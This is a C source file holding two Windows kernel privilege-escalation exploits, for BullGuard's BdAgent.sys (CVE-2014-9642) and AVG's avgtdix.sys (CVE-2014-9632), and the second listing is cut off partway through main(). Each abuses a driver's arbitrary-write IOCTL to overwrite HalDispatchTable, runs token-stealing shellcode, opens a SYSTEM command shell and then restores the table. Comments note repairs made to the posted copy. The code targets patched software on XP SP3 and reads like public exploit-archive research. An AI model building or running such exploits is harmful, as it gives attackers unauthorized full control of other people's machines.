
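/*
 * Exploit Title   - BullGuard Multiple Products Arbitrary Write Privilege Escalation
 * Date            - 04th February 2015
 * Discovered by   - Parvez Anwar (@parvezghh)
 * Vendor Homepage - http://www.bullguard.com/
 * Tested Version  - 14.1.285.4
 * Driver Version  - 1.0.0.6 - BdAgent.sys
 * Tested on OS    - 32bit Windows XP SP3
 * OSVDB           - http://www.osvdb.org/show/osvdb/114478
 * CVE ID          - CVE-2014-9642
 * Vendor fix url  - http://www.bullguard.com/about/release-notes.aspx
 * Fixed Version   - 15.0.288.1
 * Fixed driver ver- 1.0.0.7
 *
 * Note
 * ----
 * Overwritten HAL dispatch table after exploit
 *
 * kd> dps nt!HalDispatchTable l c
 * 8054ccb8  00000003
 * 8054ccbc  00340000
 * 8054ccc0  00010000
 * 8054ccc4  0a060002
 * 8054ccc8  ee657645
 * 8054cccc  00000001
 * 8054ccd0  00000001
 * 8054ccd4  867c1bf0
 * 8054ccd8  80613f7b nt!IoSetPartitionInformation
 * 8054ccdc  806141ef nt!IoWritePartitionTable
 * 8054cce0  8052d157 nt!CcHasInactiveViews
 * 8054cce4  804e42d1 nt!ObpTraceDepth+0x19
 *
 * 7 pointers get overwritten. Since input buffer is in our control and pointers
 * are static in XP I've triggered the overwrite again restoring the pointers.
 *
 * Review notes on this listing (changes from the posted copy):
 *  - "&pi" had been garbled to "?" in spawnShell(); restored.
 *  - HalDispatchTableAddress() returned -1 on failure and main() added 4 to it
 *    and used the result as the kernel write target; it now returns 0 and
 *    main() refuses to send anything unless the address was resolved.
 *  - main() only aborted when GetVersion() matched nothing at all, so the XP
 *    SP3 offsets and the hardcoded restore addresses below could be written
 *    into a Windows 7 / Server 2003 kernel; it now requires XP.
 *  - The payload's final "ret 8" was missing its third byte (ret imm16 is
 *    3 bytes); the 0x90 NOP fill used to supply it, giving "ret 0x9008".
 *  - Return values of the two NtQuerySystemInformation calls, strrchr() and
 *    DeviceIoControl() are checked; the module buffer and kernel handle are
 *    released; devhandle is a char buffer as sprintf/CreateFile expect.
 */

#include <stdio.h>
#include <string.h>
#include <conio.h>     /* getch() - used by the posted listing without its header */
#include <windows.h>

#define BUFSIZE 4096

#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#endif

/* Module list entry as returned by SystemModuleInformation; only Module[0]
 * (the kernel image) is consumed here. */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    PVOID  Unknown1;
    PVOID  Unknown2;
    PVOID  Base;
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval);

typedef void (*FUNCTPTR)();

// Windows XP SP3 structure offsets. Every value is build specific; nothing in
// this file is valid on another Windows release.
#define XP_KPROCESS 0x44   // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8   // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84   // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88   // Offset to ActiveProcessLinks _EPROCESS struct

/*
 * Token-stealing payload. Walks ActiveProcessLinks from the current process
 * until it finds UniqueProcessId 4 (System) and copies that process' Token
 * pointer over the current process' Token. It runs in kernel mode via the
 * overwritten HalDispatchTable+4 slot, so it saves/restores the registers it
 * clobbers and leaves with a stdcall-style ret.
 */
BYTE token_steal_xp[] = {
    0x52,                                                   // push edx                   Save edx on the stack
    0x53,                                                   // push ebx                   Save ebx on the stack
    0x33,0xc0,                                              // xor eax, eax               eax = 0
    0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                     // mov eax, fs:[eax+124h]     Retrieve ETHREAD
    0x8b,0x40,XP_KPROCESS,                                  // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
    0x8b,0xc8,                                              // mov ecx, eax
    0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                      // mov ebx, [eax+XP_TOKEN]    Retrieves TOKEN
    0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                    // mov eax, [eax+XP_APLINKS]  <-| Retrieve FLINK from ActiveProcessLinks
    0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                    // sub eax, XP_APLINKS          | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,   // cmp [eax+XP_UPID], 4         | Compares UniqueProcessId with 4 (System Process)
    0x75,0xe8,                                              // jne ----------------------
    0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                      // mov edx, [eax+XP_TOKEN]    Retrieves TOKEN and stores on EDX
    0x8b,0xc1,                                              // mov eax, ecx               Retrieves KPROCESS stored on ECX
    0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                      // mov [eax+XP_TOKEN], edx    Overwrites the TOKEN for the current KPROCESS
    0x5b,                                                   // pop ebx                    Restores ebx
    0x5a,                                                   // pop edx                    Restores edx
    0xc2,0x08,0x00                                          // ret 8                      Away from the kernel (3-byte encoding, see header note)
};

/*
 * Original HalDispatchTable contents (XP SP3 32-bit, from kd) written back
 * after the shell has been spawned. These are raw kernel addresses for one
 * build: on any other ntoskrnl/hal build this write corrupts the table and
 * bugchecks the machine, which is why main() insists on XP.
 * 7 entries = 28 bytes, matching the 7 pointers the driver clobbers; the
 * string literal's trailing NUL is excluded by the sizeof-1 in main().
 */
BYTE restore_pointers_xp[] =          // kd> dps nt!HalDispatchTable
    "\xf2\xa3\x6f\x80"                // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
    "\xce\xa3\x6f\x80"                // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
    "\x0b\x46\x61\x80"                // 8054ccc4 8061460b nt!xHalQueryBusSlots
    "\x00\x00\x00\x00"                // 8054ccc8 00000000
    "\x4d\xac\x50\x80"                // 8054cccc 8050ac4d nt!HalExamineMBR
    "\x89\x6f\x5c\x80"                // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
    "\xe5\x4a\x5c\x80";               // 8054ccd4 805c4ae5 nt!IoReadPartitionTable

/*
 * Resolve the kernel virtual address of nt!HalDispatchTable.
 *
 * The kernel image is mapped into this process as an ordinary DLL,
 * HalDispatchTable is looked up as an export, and its RVA is rebased onto
 * the real kernel base reported by SystemModuleInformation.
 *
 * Returns the kernel address, or 0 on any failure. 0 is never a valid
 * kernel address, unlike the -1 the posted listing returned (which main()
 * then incremented by 4 and used as the arbitrary-write target).
 */
DWORD HalDispatchTableAddress()
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo;
    DWORD HalDispatchTable = 0;
    CHAR kFullName[256];
    PVOID kBase = NULL;
    LPSTR kName;
    HMODULE Kernel;
    FUNCTPTR Hal;
    ULONG len = 0;
    NTSTATUS status;

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return 0;
    }

    /* Size probe: the expected outcome is STATUS_INFO_LENGTH_MISMATCH with len filled in. */
    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    if (status != STATUS_INFO_LENGTH_MISMATCH || len == 0) {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", (unsigned int)status);
        return 0;
    }

    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    if (pModuleInfo == NULL) {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return 0;
    }

    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
    if (status != 0 || pModuleInfo->Count == 0) {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", (unsigned int)status);
        GlobalFree(pModuleInfo);
        return 0;
    }

    /* Module[0] is the kernel image; ImageName is a path such as \WINDOWS\system32\ntoskrnl.exe */
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName) - 1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;
    GlobalFree(pModuleInfo);
    printf("[i] Kernel base name %s\n", kFullName);

    kName = strrchr(kFullName, '\\');
    if (kName == NULL) {
        printf("[-] Unexpected kernel image name\n\n");
        return 0;
    }
    Kernel = LoadLibraryA(kName + 1);
    if (Kernel == NULL) {
        printf("[-] Failed to load kernel base\n\n");
        return 0;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
    if (Hal == NULL) {
        printf("[-] Failed to find HalDispatchTable\n\n");
        FreeLibrary(Kernel);
        return 0;
    }

    printf("[i] HalDispatchTable address 0x%08x\n", (unsigned int)(ULONG_PTR)Hal);
    printf("[i] Kernel handle 0x%08x\n", (unsigned int)(ULONG_PTR)Kernel);
    printf("[i] Kernel base address 0x%08x\n", (unsigned int)(ULONG_PTR)kBase);

    /* user-mode export address - user-mode load address + real kernel base */
    HalDispatchTable = (DWORD)((ULONG_PTR)Hal - (ULONG_PTR)Kernel + (ULONG_PTR)kBase);
    FreeLibrary(Kernel);

    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
    if (!HalDispatchTable) {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return 0;
    }
    return HalDispatchTable;
}

/*
 * Classify the running Windows version from GetVersion().
 * LOBYTE(LOWORD) is the major and HIBYTE(LOWORD) the minor version.
 * Returns 1 for Windows XP (5.1), 2 for Windows 7 (6.1), 3 for Server 2003
 * (5.2), 0 otherwise. Only 1 is accepted by main(): the offsets and the
 * restore table above are XP SP3 specific.
 */
int GetWindowsVersion()
{
    DWORD version = GetVersion();
    DWORD minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    DWORD majVersion = (DWORD)(LOBYTE(LOWORD(version)));
    int v = 0;

    if (minVersion == 1 && majVersion == 5) v = 1;   // Windows XP
    if (minVersion == 1 && majVersion == 6) v = 2;   // Windows 7
    if (minVersion == 2 && majVersion == 5) v = 3;   // Windows Server 2003
    return v;
}

/*
 * Spawn an interactive cmd.exe in a new console. Called after the payload
 * has replaced this process' token, so the child runs with that token.
 * A CreateProcess failure is reported and swallowed so that main() still
 * gets to restore the dispatch table.
 */
void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char cmdline[] = "cmd.exe";   /* lpCommandLine must be writable storage */

    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcessA(NULL, cmdline, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
        printf("\n[-] CreateProcess failed (%d)\n\n", (int)GetLastError());
        return;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

/*
 * Entry point.
 * 1. Verify XP, resolve NtQueryIntervalProfile, stage the payload in RWX memory.
 * 2. Open \\.\bdagent and, via IOCTL 0x0022405c, have the driver write the
 *    4-byte input buffer (the payload address) to the caller-supplied output
 *    address HalDispatchTable+4 (the driver does not honour the zero output length).
 * 3. NtQueryIntervalProfile reaches the kernel through that slot, running the
 *    payload; spawn cmd.exe with the stolen token.
 * 4. Write the saved XP SP3 pointers back through the same primitive.
 */
int main(int argc, char *argv[])
{
    _NtQueryIntervalProfile NtQueryIntervalProfile;
    LPVOID input[1] = {0};
    LPVOID addrtoshell;
    HANDLE hDevice;
    DWORD dwRetBytes = 0;
    DWORD HalDispatchTable;
    DWORD HalDispatchTableTarget;
    ULONG time = 0;
    BOOL ok;
    char devhandle[MAX_PATH];

    (void)argc;
    (void)argv;

    printf("-------------------------------------------------------------------------------\n");
    printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n");
    printf(" Tested on Windows XP SP3 (32bit) \n");
    printf("-------------------------------------------------------------------------------\n\n");

    /* Hard requirement: offsets, IOCTL behaviour and restore table are XP SP3 only. */
    if (GetWindowsVersion() != 1) {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }
    printf("[i] Running Windows XP\n");

    sprintf(devhandle, "\\\\.\\%s", "bdagent");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;
    }

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addrtoshell == NULL) {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", (unsigned int)GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", (unsigned int)(ULONG_PTR)addrtoshell);

    /* NOP sled fill, then the payload at the start of the page. */
    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %d bytes\n", (int)sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, (int)GetLastError());
        return -1;
    }
    printf("[+] Open %s device successful\n", devhandle);

    /* Never send the write with an unresolved target: that is a guaranteed bugcheck. */
    HalDispatchTable = HalDispatchTableAddress();
    if (HalDispatchTable == 0) {
        printf("[-] HalDispatchTable not resolved, nothing sent\n\n");
        CloseHandle(hDevice);
        return -1;
    }
    HalDispatchTableTarget = HalDispatchTable + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;   // input buffer contents gets written to our output buffer address
    printf("[+] Input buffer contents %08x\n", (unsigned int)(ULONG_PTR)input[0]);
    printf("[~] Press any key to send Exploit . . .\n");
    getch();

    ok = DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    printf("[+] Buffer sent\n");
    if (!ok) {
        /* The posted listing ignored this; whether the kernel write happened anyway is unknown. */
        printf("[!] DeviceIoControl returned failure (%d), continuing as the original did\n", (int)GetLastError());
    }

    printf("[+] Spawning SYSTEM Shell\n");
    NtQueryIntervalProfile(2, &time);   /* reaches the kernel through HalDispatchTable+4 -> payload */
    spawnShell();

    printf("[+] Restoring Hal dispatch table pointers\n\n");
    ok = DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp) - 1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    if (!ok) {
        printf("[!] Restore write failed (%d): HalDispatchTable may still be clobbered, expect instability\n\n", (int)GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}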
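/*
 * Exploit Title   - AVG Internet Security 2015 Arbitrary Write Privilege Escalation
 * Date            - 04th February 2015
 * Discovered by   - Parvez Anwar (@parvezghh)
 * Vendor Homepage - http://www.avg.com/
 * Tested Version  - 2015.0.5315
 * Driver Version  - 15.0.0.5204 - avgtdix.sys
 * Tested on OS    - 32bit Windows XP SP3
 * OSVDB           - http://www.osvdb.org/show/osvdb/113824
 * CVE ID          - CVE-2014-9632
 * Vendor fix url  - http://www.avg.com/eu-en/avg-release-notes
 * Fixed Version   - 2015.0.5557
 * Fixed driver ver- 15.0.0.5553
 *
 * Note
 * ----
 * Overwritten HAL dispatch table after exploit
 *
 * kd> dps nt!HalDispatchTable l c
 * 8054ccb8  00000003
 * 8054ccbc  00340000
 * 8054ccc0  8678d9a0
 * 8054ccc4  0a050002
 * 8054ccc8  6e66744e
 * 8054cccc  001c0707
 * 8054ccd0  00000180
 * 8054ccd4  000001a4
 * 8054ccd8  867d6690
 * 8054ccdc  86706480
 * 8054cce0  00000000
 * 8054cce4  804e42d1 nt!ObpTraceDepth+0x19
 *
 * 10 pointers get overwritten. Since input buffer is in our control and pointers
 * are static in XP I've triggered the overwrite again restoring the pointers.
 *
 * Review notes on this listing (changes from the posted copy):
 *  - "&pi" had been garbled to "?" in spawnShell(); restored.
 *  - HalDispatchTableAddress() returned -1 on failure and main() added 4 to it
 *    and used the result as the kernel write target; it now returns 0 and
 *    main() refuses to send anything unless the address was resolved.
 *  - main() only aborted when GetVersion() matched nothing at all, so the XP
 *    SP3 offsets and the hardcoded restore addresses below could be written
 *    into a Windows 7 / Server 2003 kernel; it now requires XP.
 *  - The payload's final "ret 8" was missing its third byte (ret imm16 is
 *    3 bytes); the 0x90 NOP fill used to supply it, giving "ret 0x9008".
 *  - Return values of the two NtQuerySystemInformation calls, strrchr() and
 *    DeviceIoControl() are checked; the module buffer and kernel handle are
 *    released; devhandle is a char buffer as sprintf/CreateFile expect.
 */

#include <stdio.h>
#include <string.h>
#include <conio.h>     /* getch() - used by the posted listing without its header */
#include <windows.h>

#define BUFSIZE 4096

#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#endif

/* Module list entry as returned by SystemModuleInformation; only Module[0]
 * (the kernel image) is consumed here. */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    PVOID  Unknown1;
    PVOID  Unknown2;
    PVOID  Base;
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval);

typedef void (*FUNCTPTR)();

// Windows XP SP3 structure offsets. Every value is build specific; nothing in
// this file is valid on another Windows release.
#define XP_KPROCESS 0x44   // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8   // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84   // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88   // Offset to ActiveProcessLinks _EPROCESS struct

/*
 * Token-stealing payload. Walks ActiveProcessLinks from the current process
 * until it finds UniqueProcessId 4 (System) and copies that process' Token
 * pointer over the current process' Token. It runs in kernel mode via the
 * overwritten HalDispatchTable+4 slot, so it saves/restores the registers it
 * clobbers and leaves with a stdcall-style ret.
 */
BYTE token_steal_xp[] = {
    0x52,                                                   // push edx                   Save edx on the stack
    0x53,                                                   // push ebx                   Save ebx on the stack
    0x33,0xc0,                                              // xor eax, eax               eax = 0
    0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                     // mov eax, fs:[eax+124h]     Retrieve ETHREAD
    0x8b,0x40,XP_KPROCESS,                                  // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
    0x8b,0xc8,                                              // mov ecx, eax
    0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                      // mov ebx, [eax+XP_TOKEN]    Retrieves TOKEN
    0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                    // mov eax, [eax+XP_APLINKS]  <-| Retrieve FLINK from ActiveProcessLinks
    0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                    // sub eax, XP_APLINKS          | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,   // cmp [eax+XP_UPID], 4         | Compares UniqueProcessId with 4 (System Process)
    0x75,0xe8,                                              // jne ----------------------
    0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                      // mov edx, [eax+XP_TOKEN]    Retrieves TOKEN and stores on EDX
    0x8b,0xc1,                                              // mov eax, ecx               Retrieves KPROCESS stored on ECX
    0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                      // mov [eax+XP_TOKEN], edx    Overwrites the TOKEN for the current KPROCESS
    0x5b,                                                   // pop ebx                    Restores ebx
    0x5a,                                                   // pop edx                    Restores edx
    0xc2,0x08,0x00                                          // ret 8                      Away from the kernel (3-byte encoding, see header note)
};

/*
 * Original HalDispatchTable contents (XP SP3 32-bit, from kd) written back
 * after the shell has been spawned. These are raw kernel addresses for one
 * build: on any other ntoskrnl/hal build this write corrupts the table and
 * bugchecks the machine, which is why main() insists on XP.
 * 10 entries = 40 bytes, matching the 10 pointers the driver clobbers; the
 * string literal's trailing NUL is excluded by the sizeof-1 in main().
 */
BYTE restore_pointers_xp[] =          // kd> dps nt!HalDispatchTable
    "\xf2\xa3\x6f\x80"                // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
    "\xce\xa3\x6f\x80"                // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
    "\x0b\x46\x61\x80"                // 8054ccc4 8061460b nt!xHalQueryBusSlots
    "\x00\x00\x00\x00"                // 8054ccc8 00000000
    "\x4d\xac\x50\x80"                // 8054cccc 8050ac4d nt!HalExamineMBR
    "\x89\x6f\x5c\x80"                // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
    "\xe5\x4a\x5c\x80"                // 8054ccd4 805c4ae5 nt!IoReadPartitionTable
    "\x7b\x3f\x61\x80"                // 8054ccd8 80613f7b nt!IoSetPartitionInformation
    "\xef\x41\x61\x80"                // 8054ccdc 806141ef nt!IoWritePartitionTable
    "\x57\xd1\x52\x80";               // 8054cce0 8052d157 nt!CcHasInactiveViews

/*
 * Resolve the kernel virtual address of nt!HalDispatchTable.
 *
 * The kernel image is mapped into this process as an ordinary DLL,
 * HalDispatchTable is looked up as an export, and its RVA is rebased onto
 * the real kernel base reported by SystemModuleInformation.
 *
 * Returns the kernel address, or 0 on any failure. 0 is never a valid
 * kernel address, unlike the -1 the posted listing returned (which main()
 * then incremented by 4 and used as the arbitrary-write target).
 */
DWORD HalDispatchTableAddress()
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo;
    DWORD HalDispatchTable = 0;
    CHAR kFullName[256];
    PVOID kBase = NULL;
    LPSTR kName;
    HMODULE Kernel;
    FUNCTPTR Hal;
    ULONG len = 0;
    NTSTATUS status;

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return 0;
    }

    /* Size probe: the expected outcome is STATUS_INFO_LENGTH_MISMATCH with len filled in. */
    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    if (status != STATUS_INFO_LENGTH_MISMATCH || len == 0) {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", (unsigned int)status);
        return 0;
    }

    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    if (pModuleInfo == NULL) {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return 0;
    }

    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
    if (status != 0 || pModuleInfo->Count == 0) {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", (unsigned int)status);
        GlobalFree(pModuleInfo);
        return 0;
    }

    /* Module[0] is the kernel image; ImageName is a path such as \WINDOWS\system32\ntoskrnl.exe */
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName) - 1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;
    GlobalFree(pModuleInfo);
    printf("[i] Kernel base name %s\n", kFullName);

    kName = strrchr(kFullName, '\\');
    if (kName == NULL) {
        printf("[-] Unexpected kernel image name\n\n");
        return 0;
    }
    Kernel = LoadLibraryA(kName + 1);
    if (Kernel == NULL) {
        printf("[-] Failed to load kernel base\n\n");
        return 0;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
    if (Hal == NULL) {
        printf("[-] Failed to find HalDispatchTable\n\n");
        FreeLibrary(Kernel);
        return 0;
    }

    printf("[i] HalDispatchTable address 0x%08x\n", (unsigned int)(ULONG_PTR)Hal);
    printf("[i] Kernel handle 0x%08x\n", (unsigned int)(ULONG_PTR)Kernel);
    printf("[i] Kernel base address 0x%08x\n", (unsigned int)(ULONG_PTR)kBase);

    /* user-mode export address - user-mode load address + real kernel base */
    HalDispatchTable = (DWORD)((ULONG_PTR)Hal - (ULONG_PTR)Kernel + (ULONG_PTR)kBase);
    FreeLibrary(Kernel);

    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
    if (!HalDispatchTable) {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return 0;
    }
    return HalDispatchTable;
}

/*
 * Classify the running Windows version from GetVersion().
 * LOBYTE(LOWORD) is the major and HIBYTE(LOWORD) the minor version.
 * Returns 1 for Windows XP (5.1), 2 for Windows 7 (6.1), 3 for Server 2003
 * (5.2), 0 otherwise. Only 1 is accepted by main(): the offsets and the
 * restore table above are XP SP3 specific.
 */
int GetWindowsVersion()
{
    DWORD version = GetVersion();
    DWORD minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    DWORD majVersion = (DWORD)(LOBYTE(LOWORD(version)));
    int v = 0;

    if (minVersion == 1 && majVersion == 5) v = 1;   // Windows XP
    if (minVersion == 1 && majVersion == 6) v = 2;   // Windows 7
    if (minVersion == 2 && majVersion == 5) v = 3;   // Windows Server 2003
    return v;
}

/*
 * Spawn an interactive cmd.exe in a new console. Called after the payload
 * has replaced this process' token, so the child runs with that token.
 * A CreateProcess failure is reported and swallowed so that main() still
 * gets to restore the dispatch table.
 */
void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char cmdline[] = "cmd.exe";   /* lpCommandLine must be writable storage */

    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcessA(NULL, cmdline, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
        printf("\n[-] CreateProcess failed (%d)\n\n", (int)GetLastError());
        return;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

/*
 * Entry point.
 * 1. Verify XP, resolve NtQueryIntervalProfile, stage the payload in RWX memory.
 * 2. Open \\.\avgtdi and, via IOCTL 0x830020f8, have the driver write the
 *    4-byte input buffer (the payload address) to the caller-supplied output
 *    address HalDispatchTable+4 (the driver does not honour the zero output length).
 * 3. NtQueryIntervalProfile reaches the kernel through that slot, running the
 *    payload; spawn cmd.exe with the stolen token.
 * 4. Write the saved XP SP3 pointers back through the same primitive.
 */
int main(int argc, char *argv[])
{
    _NtQueryIntervalProfile NtQueryIntervalProfile;
    LPVOID input[1] = {0};
    LPVOID addrtoshell;
    HANDLE hDevice;
    DWORD dwRetBytes = 0;
    DWORD HalDispatchTable;
    DWORD HalDispatchTableTarget;
    ULONG time = 0;
    BOOL ok;
    char devhandle[MAX_PATH];

    (void)argc;
    (void)argv;

    printf("-------------------------------------------------------------------------------\n");
    printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n");
    printf(" Tested on Windows XP SP3 (32bit) \n");
    printf("-------------------------------------------------------------------------------\n\n");

    /* Hard requirement: offsets, IOCTL behaviour and restore table are XP SP3 only. */
    if (GetWindowsVersion() != 1) {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }
    printf("[i] Running Windows XP\n");

    sprintf(devhandle, "\\\\.\\%s", "avgtdi");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;
    }

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addrtoshell == NULL) {
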